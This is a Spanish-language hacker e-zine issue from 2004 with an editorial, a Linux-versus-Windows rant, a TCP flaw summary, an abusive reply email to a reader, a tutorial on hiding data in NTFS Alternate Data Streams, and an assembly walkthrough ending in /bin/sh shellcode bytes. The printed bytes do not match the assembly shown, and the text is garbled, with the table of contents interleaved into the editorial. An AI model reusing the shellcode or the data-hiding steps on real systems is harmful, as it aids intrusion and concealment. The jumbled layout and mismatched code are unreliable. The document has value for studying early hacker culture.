Raza 16
Raza 16
Raza 16
Raza-Mexicana
Contenido
Según la definición del pequeño larousse de mi sobrino, miedo es :
Sentimiento de gran inquietud suscitado por un peligro. Lo cual me
lleva a pensar que siendo el miedo un sentimiento (subjetivo, personal Verdades ..............................1
y transferible) entonces vive en la mente de quien así lo cree (o que le Grave vulneribilidad en el
conviene creerlo) y de alguna manera se puede influenciar a otros para protocolo TCP ......................9
tener el mismo sentimiento. Pero en la actualidad el miedo sufre un Un Email de tantos .............12
cambio mercadológico, llegando a convertirse en un productor
altamente comercializable. “Vender miedo”, he aquí la respuesta.
ADS – Alternate Data
Promover la idea del infierno y del demonio para que cada día se unan Streams ..............................15
mas creyentes y así las ganancias del templo rápidamente crezcan. Ensamblador. Hablando Con
Promover la idea de los hacker y crackers para que cada día mas La Máquina En El Mismo
empresas contraten mis servicios de seguridad y así mis ganancias Lenguaje ............................22
crezcan. Es verdad que existen una amenaza constante y que dicha
amenaza crece conforme la tecnología abarca cada vez mas áreas de
Shutdown en FreeBSD y
nuestra vida cotidiana, pero no hay que generar una psicosis de ello, Windows. ...........................28
hay que tomar las cosas con seriedad y encontrar los métodos y Introducción al Wireless ....31
formas apropiadas para cuidar nuestra lan, pc, información, etc. Como configurar Squid –
Proxy Cache + Usuarios
Antes los sistemas eran mas inseguros y la culpa no era tanto de
software si no de los administradores, las instalaciones por default y
Autentificados ....................36
las malas configuraciones ponían en riesgo su integridad y en la Evolution ............................43
actualidad este fenómeno se ve disminuido, en la actualidad los Colaborando con la EZine .45
administradores se preocupan mas por administrar bien sus servidores, Virus VBS, realidad o simple
cerrar puertos, filtrar paquetes, no dejar passwords por default. chacoteo .............................48
Exploits siempre habrán, no importando que tan bueno sea el
arquitecto, diseñador, analista o programador, sin importar que tan
Construyendo el troyano ideal
buena sea la herramienta de desarrollo, el lenguaje de programación o parte 2 ................................54
el protocolo que se use. Breve historia sobre CFE ...63
Despedida ..........................69
La respuesta no está en andar como sicótico husmeando en el
underground, tratando de convertirse en un hacker o cracker, ni
contratar los servicios de una empresa de ultra seguridad, la respuesta
está en la correcta administración de nuestros recursos, parchar
nuestros servidores, estar al día con las nuevas vulnerabilidades, poner
un buen firewall, mantener actualizado nuestro antivirus y lo mas
importante, educar a nuestros usuarios para que hagan un uso correcto
y prudente de los servicios a los que tienen acceso.
Vlad
VERDADES
Por DeadSector ([email protected])
NOTA : Las opiniones expresadas aquí son mías. No son compartidas por mis
compañeros de raza-mexicana y no hablo a nombre del grupo. Hay miembros de raza que
apoyan mucho a Linux y la comunidad opensource.
Hay gente que odia a Microsoft solo por ser Microsoft. Si Bill Gates pudiera
caminar sobre agua dirían que es porque no sabe nadar.
Existen personas poco éticas, mentirosas, falsas e ignorantes a las cuales les llamo
“linuxeros”. Estoy hablando de esas personas que dicen y creen que Linux es “La
Solución” sin tomar en cuenta el problema. No les importa cuales sean las necesidades de
las empresas o del usuario. Ellos solo saben que si necesitas una solución esa es Linux. Ser
mas estúpido seria algo criminal.
Siempre hay que escuchar al cliente o al usuario. Preguntarles que problema tienen
o que necesitan para hacer su trabajo más fácil. O para que quieren usar su computadora.
SOLO ENTONCES podrás encontrar la solución o podrás ofrecerles el sistema operativo
que necesitan. Y esa solución puede ser Windows, Unix, o alguna copia barata de Unix
como Linux o Freebsd. Digo baratas porque no todas las distros de Linux son gratuitas.
Todo depende de las necesidades del cliente y el tiempo y dinero que están dispuestos a
invertir para implementar esa solución.
“linux rulz”
“windows sux”
“bill gates is the devil”
Les he preguntado a este tipo de personas que es lo que les gusta de Linux. La
mayoría no sabe ni siquiera distinguir entre el sistema operativo y las aplicaciones que
corren en él. Y muchas veces dirán cosas malas de Microsoft. La gran mayoría de estas
serán mentiras y no tendrán pruebas para respaldar sus acusaciones. Hay linuxeros que se
creen evangelizadores. Que es evangelizar? Según algunos diccionarios seria instruir a
alguien en la doctrina del evangelio, predicar la fe o las virtudes cristianas. Unas de las
respuestas que me han dado has sido las siguientes:
“Linux es mas seguro que Windows” es una frase que repiten mucho los linuxeros.
NO ES CIERTO. Es una mentira de linuxeros. Si tomáramos en cuenta todos los parches
que existen para Windows2000 y todos los parches que existen para una distro Linux de
hace 4 años nos daríamos cuenta que para Windows 2000 Advanced Server instalas
servicepack 4 y 6 parches críticos. Cuando le pregunto a un linuxero cuantos parches hay
para un distro de Linux de hace 4 años no saben. Nadie me ha podido dar una respuesta. El
único distro de Linux que busque era redhat 7.1 aunque no era del 2000 sino 2001 me canse
de contar cuantos parches de seguridad tenían. Perdí la cuenta en 140. Crees que no es justo
comparar windows2000 con una distro Linux del mismo tiempo? Comparemos
windows2003 con redhat Linux 9. Parches críticos para windows2003 son 2. parches de
seguridad para redhat Linux 9 son 69. Si nos basamos en este dato se podría decir que
Windows es mas seguro. Si embargo NO LO VOY A DECIR.
Es mejor opensource? Es mas seguro? Claro que no. Y como ejemplo te puedo dar a
Macintosh. Las MAC tenían fama de ser muy muy seguras. Los usuarios y admins de MAC
decían que no tenían los problemas de Windows o Linux. Que no tenían fallas de
seguridad. Y todo porque era un sistema cerrado y poca gente usaba MAC. Hoy todavía
muy poca gente usa MAC pero algo cambio. Ahora están usando sistema operativo
opensource y comenzaron a batallar con todos los problemas de seguridad que esto atrae.
Falla tras falla y parche tras parche. Bueno. Ya quedo claro que Linux NO es mas seguro
que Windows.
Cuando tuve una discusión con unas personas “muy inteligentes” con mucha
experiencia en Linux y que desarrollan software de Linux me quisieron explicar de la
estabilidad de Linux comparada con Windows. Les dije que yo nunca había tenido
problemas con Windows y no me creían. Para convencerme me platicaron esta historia:
“había una vez una empresa que tenia máquinas con Windows y
otras con Linux. Un día hubo un apagón. Se fue la corriente
eléctrica momentáneamente. TODAS las computadoras que
corrían Windows se rebotearon. Pero sorprendentemente la que
corría LINUX había seguido trabajando sin problemas”
Otra de las personas presentes dijo “probablemente esa máquina tenia un respaldo
de batería” a lo cual el linuxero contesto muy emocionado “NOOO. Eso es lo grandioso de
la estabilidad de Linux”
Solo nos quedo concluir que Linux probablemente trabaja en un plano espiritual y
no necesita de corriente eléctrica. Para los principiantes que al leer esto se emocionan y
quieren correr a comprar Linux déjenme decirles que ES MENTIRA!!! Ningún
HARDWARE seguirá funcionando cuando le quites la corriente. No importa que sistema
operativo estés corriendo.
Este tipo de personas mienten. Y cuando tu les dices de tus experiencias con
Windows ellos te acusan a ti de mentir. Tengo casi 3 años en mi trabajo actual y los
desktops están corriendo Windows XP. NUNCA he tenido una pantalla azul. Nunca he
tenido problemas con software. Todas las fallas han sido de hardware. La mayoría
problemas con discos duros o fuentes de poder. Los únicos problemas que he tenido de
software han sido de usuarios que olvidan sus contraseñas. En los servidores tenemos
algunos 6 o 7 Windows 2000 advanced Server. 2 todavía tienen NT4 y 3 están corriendo
Linux.
Los 3 Linux anteriormente tenían redhat y después fueron cambiados a suse Linux.
Desde entonces se han hecho upgrades de suse 7.2 , 8.0 8.2 y ahora suse 9.
Con Windows nunca he tenido problemas. Será porque siempre he instalado los
parches cuando salen y siguiendo recomendaciones de Microsoft. Microsoft no solo regala
software para hacer tu trabajo mas fácil sino también han publicado varios documentos
muy buenos hablando desde instalación, configuraron y seguridad para sus productos.
Tienen herramientas muy buenas para mantener tus máquinas parchadas y poder verificar
que parches les faltan. El soporte que da Microsoft no me ha tocado ver en ninguna otra
compañía. El soporte de Microsoft es de los mejores del mundo.
Y mis servidores Linux? Bueno ahí es otra historia. También he tenido problemas
de hardware pero mas han sido por software. Todo comenzó con redhat. Tenía problemas
para instalar parches. Usaba el onlineupdate de redhat para no perder tiempo bajando
parches manualmente. El tiempo es algo muy importante para todas las empresas. Sin
embargo redhat nos quería forzar a comprar pólizas de soporte para cada una de esas 3
máquinas. Lo cual no hicimos. Cuando compramos el software esperábamos tener soporte
ya que eso decía en la caja, pero no leímos detalladamente lo que estaban ofreciendo, te
daban soporte de instalación solo 30 días, updates solo 180 días, soporte para configurar
apache solo en versiones redhat Linux pro 30 días. Si quieres mas tienes que pagar extra.
Aun así seguíamos usando redhat porque era el gigante de Linux. La empresa mas
grande y que nos podía asegurar que tendríamos alguien en quien confiar durante mucho
tiempo. Grande fue la sorpresa cuando redhat anuncia que redhat Linux llego a su fin
porque no había dinero en Linux. Solo manejaran versiones enterprise.
Te ofrecían updates, PERO solo una máquina a la vez podía hacer updates, así que
entrabas por web y dabas de alta tus 3 servidores, luego seleccionabas cual de los 3 podía
hacer los updates, hacías update a ese servidor y entrabas por web a redhat y configurabas
otro servidor para hacer updates y luego el siguiente. Era muy tardado.
De repente dejaron de funcionar los updates, decía que no se podía verificar los
archivos blahblah. Un día tuvimos problemas con la electricidad, cuando regreso la
electricidad todo arranco menos esos servidores Linux. Como los servidores los tenemos en
un lugar remoto eso significaba manejar en tráfico durante 1 hora a 2 horas dependiendo de
trafico, al llegar me dio coraje leer la razón por la falla. Linux decía “la máquina se apago y
algo puede estar mal. Entra en modo single user y verifica que el filesystem esta correcto.
Luego ya puedes rebotear normalmente.”
Fue cuando cambiamos a SUSE Linux que ya usaba por default el reiser journaling
file system. Se terminaron esos problemas. Todo seguía funcionando muy bien. Online
update ya no era un problema. YAST funcionaba muy bien. Y cuando dejaba de funcionar
ya había pasado suficiente tiempo y era tiempo de hacer upgrade a versiones nuevas.
Inclusive las versiones nuevas de suse pueden hacer automáticamente los updates.
Sin embargo seguimos usando hasta la fecha SUSE Linux en esos servidores.
Porque? Porque esos problemas no eran todos los días. Para el uso que le daríamos a esos
servidores Linux era la mejor opción. Para hacerlo de Windows tendríamos que manejarlo
de otra manera y no seria lo más fácil. Decidimos usar Linux porque era la solución
adecuada para ese trabajo. Para otras cosas tenemos Windows porque es la solución
adecuada para esos trabajos.
Linux para mi no es mas estable que Windows. Al menos en los 3 años que tengo en
mi trabajo actual eso ha sido lo contrario. Hasta podría decir por experiencia que Windows
es mas estable que Linux. PERO NO LO HARE. No existe un sistema operativo perfecto.
Y que hay del modo gráfico de Linux?. Porque se tiene que conectar por tcp/ip para
ver video? Es algo estúpido!!. Seria como arrancar Windows y luego tener que conectarte
por pcanywhere a tu misma máquina para ver modo gráfico. Con razón es mas lento todo
en Linux que en Windows. Porque no se puede comunicar el kernel directamente con
tarjeta de video sin tener que involucrar tcp/ip?
Un día jugando con iptables decidí bloquear todo y hacer mis reglas desde 0.
Bloquearía todo el trafico y solo abriría los puertos necesarios. Deny any any y chingale.
Adiós modo gráfico. SI, lo se. Fue algo pendejo. Pero estaba acostumbrado a firewalls de
Windows donde puedes bloquear TODO y solo ir abriendo lo necesario. Pero pues es Linux
que esperaba? Aquí todo tiene que ser complicado. Mentalidad linuxera. Se puede hacer de
otra manera que no requiere tcp/ip pero las distros que he manejado no lo hacen. Todas
usan tcp/ip para modo gráfico local. Y claro reclama y te dirán “hazlo tú si te interesa” .
Que mentalidad tan pendeja. Si siguen así nunca podrán convertirse en un sistema operativo
popular. A la gente hay que darle lo que pidan y no forzar a la gente a trabajar como tú
quieras. Ellos tienen el dinero y deciden como gastarlo.
Microsoft no tiene tanto dinero porque forzó a la gente a usar su producto, lo tienen
porque escuchan a sus clientes y les dan lo que piden. A ellos les interesa el dinero y el
cliente es quien tiene el dinero. La única manera para tener su dinero es teniéndolos
contentos, si la gente no está contenta con Windows migrarán a otro sistema operativo. Hay
que escuchar al cliente. Al cliente que paga.
que Windows tiene pantallas azules 3 o 5 veces al día??? Es claro que Microsoft ya metió
mano en esto!!! Deadsector trabaja para Microsoft!!! Raza-mexicana esta recibiendo dinero
de Microsoft!!! Odian a Linux!!!! Les joderé su pinche servidorsillo Windows. Eso les
enseñara… pero que pasa?? No entiendo.. su web esta corriendo en Linux… irc.raza-
mexicana.org esta corriendo Linux… entonces????? Porque lo hacen?? Blasfemos!!!
Se usa Linux porque las personas que no dan hosting lo usan. Tendrían que
preguntarles a ellos. A nosotros solo nos interesa tener nuestra pagina web y que el servicio
este barato. Y la hemos tenido en Windows, Linux o el sistema operativo que nuestro
proveedor este usando. Mientras la renta por pagina este barata no nos importa que OS este
corriendo. Porque usamos Linux en irc? Por lo mismo. Todo depende del costo.
No estoy diciendo que Linux es malo. Linux puede ser la mejor opción en muchos
casos. Solo quiero que los principiantes no sean dañados por esos comentarios de linuxeros
evangelizadores que solo les causan daño cerrándoles opciones. Todo principiante que
quiere trabajar en ramo de computadoras debe conocer y usar Windows. La mayoría de
usuarios de mundo no pueden estar equivocados. Para mi Windows ha sido una herramienta
perfecta. Para otros Linux lo es. No se cieguen. Visiten paginas pendejas como cofradía
pero solo tomen las cosas buenas. Traten de ignorar las mentiras. Como voy a saber cuales
son las mentiras??
Usen Linux y Windows. Para alguien que usa los 2 sistemas operativos esas
mentiras son obvias y no podemos ser engañados como un principiante que no tiene
conocimientos de Linux ni de Windows.
Ohh!!! Maldito hijo de Bill Gates. Dijo que cofradía era una pagina pendeja!!! Que
Linux no es la solución!!
Pues si. Cofradía no es un lugar de mentalidad abierta. Hay que tener mentalidad
cerrada para aceptar código abierto. Ellos están enfocados a Linux y opensource. Hay
muchos linuxeros muy pendejos. Si tu visitas cofradía y aportas seguido en esa pagina y te
ofenden mis acusaciones te invito a irc.raza-mexicana.org puerto 30003 donde podremos
discutir acaloradamente estos temas.
Bueno retiro lo dicho, exagere un poco. Cofradía no es una pagina pendeja pido
disculpas. Cofradía tiene muy buena información y ayudan mucho a la comunidad
opensource en México. Pero se me hacen pendejadas el tipo de noticias que ponen en ese
sito. Noticias como esta:
“La gente de IBM nos manda una guía de como migrar de Windows a Linux. Es un buen
material para enseñar a principiantes evangelizables (En el software libre, claro).”
Todas aquellas personas que hablen mal de Linux es porque reciben dinero de
Microsoft. Todas aquellas personas que digan que Linux les robo source code reciben
dinero de Microsoft. Todas aquellas personas que digan que han tenido buenas experiencias
con Microsoft es porque reciben dinero de Microsoft. Todas aquellas personas que usan
Microsoft son lamers que no tienen conocimientos. La culpa no la tiene Linux. La culpa es
siempre del usuario. La culpa no la tiene Linux . La culpa es siempre del admin. Linux
nunca falla. Es el usuario o el admin es el que falla. Si Linux falla es porque eres wei ,no
tienes conocimientos ,eres inepto , no sabes codear, no se te olvide que Linux nunca falla.
Ya dije que el que esta equivocado es el usuario?? Linux no tiene problemas. Los
problemas los tiene el admin o el usuario. Si tu Linux falla suckeas. No sabes arreglarlo tu
solo. Es tu problema y no de Linux. Y mi favorita de todas :
Yo digo que estas cosas que dicen los linuxeros son mentiras. Los Linuxeros
evangelizadores usan la fe para indoctrinar a principiantes. Estos repiten todo lo que se les
diga sin razonar. Se olvidan de la lógica la cual deberíamos usar para reducir la cantidad de
experiencia necesaria para el aprendizaje. Sus mentes débiles creen más en sus deseos que
en la razón. Nadie debería apegarse tanto a una idea hasta llegar al punto de exigir que los
demás sacrifiquen su futuro, sus opciones, su libertad de escoger lo que mejor les
convenga. Haciéndolos menos competitivos al encerrarlos en un mundo linuxero.
Por eso como ya dije : el que tiene el dinero es el usuario. Para que Linux logre
convertirse en un sistema operativo popular es necesario darle al cliente lo que pide.
Microsoft es el sistema operativo mas popular del mundo porque la mayoría de la gente del
mundo vieron algo que les gustó. Están contentos con Windows. Microsoft los complace.
Les da lo que piden. Microsoft escucha al usuario y diseña sus productos pensando en ellos.
Crees que a estos usuarios les interesa tu fe? Les pedirás ignorar la realidad? Crees
que los podrás convencer con palabras? Les dirás que es mas seguro? Que es mas potente?
Que es mas flexible? Seguirás repitiendo tus mentiras una y otra vez?
Opensource no significa que debes usar Linux. Puedes desarrollar tus proyectos
como opensource pero que estos corran en Windows. Opensource no significa Gratis.
Puedes tener código abierto y cobrar lo que quieras por tus programas.
No hay que cerrarse. Hay que saber cual es el problema y encontrar la solución
adecuada. Las soluciones pueden ser Windows, unix (sco unix , hpunix , BSD, AIX ),
Linux , freebsd , openbsd etc etc. Y aun cuando decides usar Windows no tienes porque
usar solo software de Microsoft, puedes buscar soluciones de otros desarrolladores,
servidor web apache, servidor de correos Imail , LOTUS, proxys de deerfield , firewalls
etc. software gratuito para Windows , software shareware , software que tienes que
comprar.
Existen muchas alternativas, muchas maneras de hacer las cosas. Un buen hacker
tiene que conocer todas esas opciones y buscar la solución adecuada para el problema.
Aunque el fallo fue descubierto a finales del año pasado por Paul Watson no se le
dio mayor trascendencia (como siempre), debido a que la posibilidad de un ataque exitoso
era de una en cuatro mil millones. Sin embargo, esta semana ha tomado estado público
después el mismo Paul ha descubierto un método para explotar esta vulnerabilidad con
mucha mayor facilidad.
Casi todos coinciden en que el problema podría ser muy grande, ya que involucra a
casi cualquier comunicación realizada vía Internet. No es un problema de software mal
hecho o con errores, sino que afecta directamente a toda tecnología que cumpla con los
estándares de TCP/IP (99.9%).
Ejemplos de TCP:
Relaciones de Protocolo
Básicamente, en toda conexión vía TCP, las dos partes involucradas negocian el
tamaño de la llamada "ventana TCP", que indica la cantidad de paquetes enviados por vez,
antes de pedirse y enviarse una autenticación. Esta ventana permite calcular a un atacante el
número de paquetes falsos que podría enviar para que sean aceptados, antes de ser
validados. Esta facilidad aumenta con más ancho de banda, ya que generalmente, mientras
más rápidas sean las conexiones, más grande es la ventana (y se reduce el tiempo de
necesidad de autenticación, o sea, se envían más paquetes en menos tiempo). Mientras más
paquetes se permitan por ventana, más paquetes falsos pueden insertarse.
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data | |U|A|P|R|S|F| |
| Offset| Reserved |R|C|S|S|Y|I| Window |
| | |G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Varios proveedores como CISO, Juniper ya han admitido estar afectados por el problema.
UN EMAIL DE TANTOS
Por Fatal ([email protected])
-----Original Message-----
Sent: Friday, April 30, 2004 10:16 PM
To: [email protected]
Subject: [staff] w00t (!!)
saludos
pd: la pendejada por la que fue arrestado "su colega", es sin palabras...
-----Original Message-----
From: Fatal [mailto:[email protected]]
Sent: Friday, April 30, 2004 11:52 AM
To: Dead se la come; El peje tambien
Subject: [Fwd: Estimado lector.]
No se de donde sacaste esa clasificación de que nosotros decidimos quien es lamer, newbie
o pendejo. Nadie, y léelo bien chiquitín. Nadie de nosotros llama a otra persona lamer,
nadie. Y es por una sencilla razón; nadie del medio, no solo de este equipo tiene el rango
para decidir quien es superior o inferior, a lo sumo podríamos definir a un charlatán o a un
buen hacker. Newbie? Que tiene de malo decirle a alguien newbie? Muchos lo toman como
una expresión peyorativa pero en realidad no es para clasificar mas que la experiencia de
alguien en un campo, yo por ejemplo soy newbie en programación, y cualquiera lo sabe, no
por eso me voy a sentir ofendido. Y pendejo... bueno, en ese rubro cualquiera puede llamar
pendejo a cualquier coterraneo, pero ahí es mas por consenso y por el calor del momento.
No se porque, pero algo me dice que si te tomaste la molestia para redactar este mail
no fue para defender los derechos de los desprotegidos, creo que por alguna razón te topaste
con alguno de nosotros, le caíste mal y te dijo pendejo, de ahí derivo en que supusieras que
implícito en tal insulto venia la degradación a lamer y newbie. Y te lo puedo asegurar
porque el 80% de las personas a las cuales insultamos creen que su honra y moral han sido
Ahora bien... que, como era? Ah si; "Shock dude", bueno chamaco, en caso de que
todas esas conjeturas las hagas en base a lo que cada quien escribe en la Zine, entonces creo
que tu juicio es mucho menos que objetivo, tal evaluación raya en lo burdo y lo insensato.
Antes de que empieces a ponerte de Magdalena a debrallar en que te ofendí déjame abrir un
paréntesis. La zine en un principio se hizo como foro para que los demás expresaran ciertos
comentarios, noticias o alguna nota curiosa, si bien, el tiempo hizo que evolucionara en
algo un poco mas técnico y menos informal, bueno, fue porque los tiempos en México
hicieron que florecieran los tópicos relacionados con el hacking a nivel mundial. En
números subsecuentes de la revista varios miembros se despidieron de nuestras filas y la
estabilidad de nuestro equipo se hizo patente, aun así se siguió con el proyecto de la revista
y con mucho esfuerzo se saca, con lo poco que aportan los demás es como se hace.
Sabemos que el nivel de ahora no es el de antes, muy técnico, muy eufórico, muy osado,
bueno pues lo sentimos, no esta en nuestras manos hacer el contenido mas robusto. Porque
preguntara tu pequeña e inquieta mente, bueno, eso es porque el medio ya no es el que era
antes, ya no hay clamor por el hacking, el underground en México ya dio paso a la
siguiente generación, misma en la cual tu estas haciendo tus primeros pininos, nosotros que
somos de la antigua generación nos quedan solo los recuerdos y consejos, no hay mas.
Te doy un consejo como cuates, mide tus palabras, no solo en correos, en una
discusión cara a cara contra alguien del medio no aguantarías 5 minutos, porque si algo
tenemos los de Raza-Mexicana no es voluntad, es experiencia, de 6 a 10 años en el medio,
mas o menos empezamos cuando tu todavía jugabas a las "totugas ninia".
No chiquillo, nosotros no vemos la paja en ojo ajeno, solo nos divertimos viendo
quien porta la lepra y se mofa del que la tiene mas extendida en su cuerpo. Una vez mas te
aclaro. Si en caso que no te guste el contenido de la revista, tienes 2 opciones:
1. Buscar otras opciones, hay muchas en inglés y otra mas en español que acaba de
reinaugurar su revista, Raregazz, y si aun así su contenido es muy poca cosa para tu
inconmensurado nivel...
2. Puedes invertir mas líneas de las cuales yo acabo de hacer con tu sesudo y pícaro
comentario directo o esa madre que escribiste y hacer un artículo de excelente
calidad, se que con tu perspicacia y tino para dirimir entre lo que es serio y no,
podrás confabular un artículo fantástico.
Que tal? Te gustaron las opciones? Si no, eres bienvenido a debatir al respecto en
nuestro servidor irc.raza-mexicana.org:30003, solo te advierto que ahí nos decimos pendejo
entre todos, lo cual podría ser considerado como pecado en tu casa, date unos golpes de
pecho y échate agua bendita en el perineo antes de entrar.
Siendo esto así eh... este... "Shock dude", me despido. Solo una cosa mas antes del
adiós, besitos, bye y postdata. Si vas a responder este correo, por favor, te ruego de la
manera mas atenta que no vayas a contestar una idiotez como la que expuse en la gráfica
anterior, ahorita contesté este correo con el menor número de majaderías y usando lenguaje
fácil de comprender, si vas a empezar un debate o discusión, continúala con cerebro por
favor. Gracias mil escuincle, cuídate.
PD: La pendejada por la cual alt3kx fue arrestado no nos compete, no nos interesa y no nos
incumbe, solo es punta de lanza para otro puñado mas de chiquillos idiotas que le juegan a
ser hackers invencibles, por fin se den cuenta que hay algo mas grande que papi, mami, el
niñito dios y el Ayatola Jomeini, y ese el un puto judicial dispuesto a cogerse a cualquier
geek pitero que le pique la cresta a nuestro gobierno. Diviértete.
Fatal
Raza-Mexicana
Data Streams son una secuencia de bytes .Una aplicación llena el stream escribiendo
datos en offsets específicos dentro de ese stream. Cada archivo tiene un stream principal sin
nombre asociado a él sin importar el sistema de archivos que uses (filesystem). Pero NTFS
maneja ‘named data streams’ adicionales a este ‘unnamed data stream’ que se usa
normalmente. Estos ‘named data streams’ son secuencias alternas de bytes agregados al
archivo. Aplicaciones pueden crear ‘named streams’ adicionales y accesarlos haciendo
referencia a sus nombres. Esta función permite usar datos relacionados como parte de una
misma unidad. Por ejemplo, una aplicación de graficas puede agregar un thumbnail en un
named data stream dentro del archivo NTFS que contiene la imagen.
Para ver como funcionan los data streams puedes crear un archivo que contenga
data streams múltiples agregando summary information a un archivo en un volumen NTFS.
Si tratas de mover o copiar ejemplo.doc a una partición FAT o a un floppy vas a recibir
un error.
Si copias el archivo todos los ‘named data streams’ se perderán y todos los atributos
que no son soportados por FAT serán perdidos también.
Vamos a crear un archivo 1.txt dentro de la carpeta C:\ADS desde consola que contenga
“1”. Daremos el comando dir para ver el tamaño, daremos el comando type 1.txt para ver
su contenido y daremos el comando notepad 1.txt para editar el archivo y ver su contenido
desde notepad.
Vamos a meter información a un alternate data stream. En este ejemplo voy a crear
un stream llamado ‘secreto’ dentro de este stream tendremos nuestra información
confidencial.
Cuando des el comando dir verás que solo existe 1.txt. En ningún lado podrás ver mención
de archivo 1.txt:secreto . Y el tamaño de 1.txt no aumento a pesar que agregamos mas
información en él. Cuando lo edites con notepad 1.txt no podrás ver la información secreta
que agregamos en otro stream.
Para poder ver la información que agregamos al archivo hay que pedirla por su
nombre ‘secreto’ del alternate data stream. En este caso el nombre exacto seria 1.txt:secreto
Para ver el contenido de ese data stream vamos a usar el comando: More <
1.txt:secreto Para copiar el contenido de secreto a otro archivo usaríamos el siguiente
comando: More < 1.txt:secreto > secreto.txt
No todas las aplicaciones pueden trabajar directamente con alternate data streams.
Hice unas pruebas metiendo archivos exel dentro de otros y exel de office 2003 no pudo
abrirlos. Con notepad se batalla. Tienes que nombrar el stream con su terminación .txt por
ejemplo 1.txt:secreto.txt para que lo puedas abrir directamente con notepad.
Los Alternate Data Streams no necesariamente tienen que ser en archivos. También
se puede hacer con carpetas. Por ejemplo puedes repetir todos los ejemplos pero utilizar la
carpeta c:\ads en lugar de 1.txt. O si quieres la carpeta c:\windows . Yo uso un archivo
porque es más fácil para cambiarlo de carpeta o pasarlo a otro servidor.
Tus ADS quedaran dentro de archivo siempre y cuando estés copiando el archivo
entre discos NTFS. Si lo quieres copiar a otro servidor tienes que mapear primero la carpeta
del otro servidor a tu máquina y hacer la copia de tu NTFS a el NTFS del otro servidor.
Recuerda. Si tratas de copiar a floppy o a partición FAT todos los streams con
nombre se perderán
Y unos últimos detalles. Existe un programa gratuito que puede buscar y encontrar
todos los archivos de tu maquina que tengan ADS en ellos. Se llama LADS y a final de
articulo puse link para que lo puedas bajar.
Si metiste ADS a una carpeta tendrías que borrar la carpeta. Así que no te
recomiendo que lo hagas con c:\windows . Leí que se pueden borrar usando notepad que
venia con NT4, los pasos serian los siguientes:
Si te quedaron dudas investígalas por tu propia cuenta. Experimenta para ver que
mas puedes hacer con Alternate Data Streams.
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/winxppro
/reskit/prkc_fil_xurt.asp
http://www.heysoft.de/Frames/f_faq_ads_en.htm
http://www.heysoft.de/Frames/f_sw_la_en.htm
http://patriot.net/~carvdawg/docs/dark_side.html
Definimos un programa como una lista de instrucciones con las cuales manipulamos
a la computadora para que realice una tarea específica. Es posible escribir los programas en
distintos lenguajes de programación ya sean de bajo, de medio o de alto nivel; aunque
siempre tendremos al final un programa en forma binaria, porque ésta es la única manera en
que la computadora puede ejecutarlo. Un lenguaje de bajo nivel también conocido como
lenguaje ensamblador o lenguaje de máquina, permite una interacción más directa con los
registros de la computadora sin la necesidad de utilizar bibliotecas a diferencia de un
lenguaje de alto nivel.
Para la ejecución de un programa, el Kernel realiza una lectura del mismo desde la
unidad de almacenamiento y lo carga en memoria para su ejecución, en este momento
nuestro programa se convierte en un proceso.
Como parte del núcleo o kernel existe un módulo de control del hardware encargada
del manejo de las interrupciones y de la comunicación con la máquina. De esta manera los
dispositivos pueden interrumpir a la CPU mientras está ejecutando un proceso. Si esto
ocurre, el núcleo debe reanudar la ejecución del proceso después de atender a la
interrupción. La manera en que se reanuda esta ejecución es almacenando el registro desde
donde se hace la llamada, cada vez que esa llamada tiene lugar, para que al finalizar la
ejecución de la función se retome el programa donde se dejó. Esta dirección debe
almacenarse en algún sitio y éste sitio es la pila de memoria.
Unidad de memoria
PC 1000 Dirección
Programa
(Instrucciones)
AR 2000
Datos
(Operandos)
3000
Pila
3997
SP C 3998
B 3999
A 4000
4001
DR
Como ya vimos, para que un proceso pase de modo usuario a modo supervisor es
necesario realizar una interrupción de software. Una interrupción de software consiste en
realizar una transferencia del control de programa de un proceso en cualquier momento de
su ejecución a otro programa de servicio, generada por una instrucción de solicitud de
supervisor. Después de que se ha interrumpido un programa y se ha ejecutado la rutina de
servicio, la CPU retorna al mismo estado que tenía cuando ocurrió la interrupción.
Existe además, un bloque conocido como SS (Started by Symbol), que está a cargo
de la representación en lenguaje máquina de todos los datos que habrán de ser inicializados
al momento en el que arranca la ejecución de un programa. En este bloque se indica la
cantidad de espacio de memoria que deberá reservar el núcleo para estos datos. El núcleo
inicializa esta zona en tiempo de ejecución del programa a valor 0.
xorl %eax,%eax
Cargamos el valor NULL
movl %eax,0xc(%esi)
Asignamos espacio para las variables locales
movb %eax,0x7(%esi)
Copiamos 0xb al registro EAX
movb $0xb,%al
Copiar la dirección de la dirección de la cadena al registro EBX
movl %esi,%ebx
Copiar la dirección de la cadena al registro ECX
leal 0x8(%esi),%ecx
Copiar la dirección NULL al registro EDX
leal 0xc(%esi),%edx
Interrupción a kernel mode
int $0x80
Cargamos el valor NULL en el registro EBX
xorl %ebx,%ebx
Copiamos el registro EBX en EAX
movl %ebx,%eax
Incrementamos el valor del registro EAX
inc %eax
Interrupción a kernel mode
int $0x80
Llamada a la dirección –0x24
call –0x24
Escribimos la cadena
.string \"/bin/sh\"
Obtenemos de esta forma una shellcode mostrada por Dex en la E-zine 14 quedando de esta
manera:
"\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
